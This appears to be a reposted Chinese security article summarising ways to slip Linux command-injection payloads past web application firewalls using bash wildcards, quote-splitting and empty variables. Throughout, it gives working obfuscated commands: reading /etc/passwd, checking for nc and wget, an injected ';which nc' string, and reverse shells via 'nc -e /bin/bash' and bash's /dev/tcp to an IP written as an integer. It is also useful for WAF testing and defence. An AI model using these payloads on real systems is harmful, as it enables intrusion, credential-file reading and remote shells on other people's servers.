linux命令 waf,命令执行WAF绕过技巧总结

原标题:命令执行WAF绕过技巧总结

*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

前言

如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力,这些WAF并不是想象中毫无破绽,当Web服务器是Linux平台时我们就可以利用一些技巧来绕过WAF规则集。本文主要总结Linux平台下针对RCE WAF的绕过技巧,Windows平台不在本文考虑范围内。

0×01 技巧一:通配符

在bash的操作环境中有一个非常有用的功能,那就是通配符,下面列出一些常用的通配符:

* 代表『 0 个到无穷多个』任意字符 ? 代表『一定有一个』任意字符 [ ] 同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符, 可能是 a, b, c, d 这四个任何一个』 [ - ] 若有减号在中括号内时,代表『在编码顺序内的所有字符』。例如 [0-9] 代表 0 到 9 之间的所有数字,因为数字的语系编码是连续的! [^ ] 若中括号内的第一个字符为指数符号 (^) ,那表示『反向选择』,例如 [^abc] 代表 一定有一个字符,只要是非 a, b, c 的其他字符就接受的意思。

我们可以使用通配符来执行命令,例如执行命令:

ls -l 使用通配符 /?in/?s -l

b85a89e1c496dbcc572dbb35ec1db4da.png

读取/etc/passwd:

/???/??t /??c/p???w? 有时候WAF不允许使用太多的?号 /?in/cat /?tc/p?sswd

25ea5e8bc87252b18c3b46798f824fdc.png

NC反弹shell:

nc -e /bin/bash 127.0.0.1 3737 为了避免符号.我们可以将IP地址转换成整型。 127.0.0.1 → 2130706433 使用通配符 root@kali:~# /??n/?c -e /??n/b??h 2130706433 3737

8cbfa7ac1d8d00c710239641a74947a3.png

0×02 技巧二:连接符

在bash的操作环境中还有一个非常有用的功能,那就是连接符,例如:

root@kali:~# echo hello hello root@kali:~# echo h'ello > ' hello root@kali:~# echo 'h'ell'o' hello

你唯一需要注意的就是闭合,这点很重要,利用这个我们可以绕过一些匹配字符串的WAF规则。

读取/etc/passwd:

/'b'i'n'/'c'a't' /'e't'c'/'p'a's's'w'd

c913fc6e711fac561edf1a66a7cf3f83.png

获取shell

检测NC:

/'b'i'n'/'w'h'i'c'h' 'n'c

60a3af348ee69cecafd7449d5328a4d6.png

没有NC的情况检查wget:

/'b'i'n'/'w'h'i'c'h' 'w'g'e't

d54c354580c51e62df8a803262c2a97f.png

简单粗暴(容易被检查):

bash -c 'sh -i &>/dev/tcp/2130706433/3737 0>&1'

其他字符:

双引号 /"b"i"n"/"w"h"i"c"h" "n"c

17f615ad31aadb7fee9542a7ee8101f5.png

反斜杆 /b\i\n/w\h\i\c\h n\c

92476b44aee8227e22f7c8befa0482d9.png

0×03 技巧三:未初始化的bash变量

在bash环境中允许我们使用未初始化的bash变量,如何

$a,$b,$c

我们事先并没有定义它们,输出看看:

root@kali:~# echo $a root@kali:~# echo $b root@kali:~# echo $c root@kali:~#

未初始化的变量值都是null。

读取/etc/passwd:

cat$a /etc$a/passwd$a

aae4225cb93c7eb5849b535798f5d4b8.png

测试WAF

测试代码:

6f002f6ed4fe2255cc32cf08934c1980.png

www.baidu.com;$s/bin$s/which$s nc$s

8b242c5fca3872219a1cb6eba3bd2537.png

反弹shell:

/bin$s/nc$s -e /bin$s/bash$s 2130706433 3737

执行:

543a4026db75dd1b38bfdca0d26aa51c.png

成功:

0×04 总结

本文我们主要利用了bash的通配符、连接符、未初始化的变量三个特性来绕过WAF规则,当然你可能有更好的办法,欢迎大家补充,最后感谢乐于分享的安全研究员们,没他们的分享也不会有这么多技巧出现,谢谢分享。

*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。返回搜狐,查看更多

责任编辑:

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值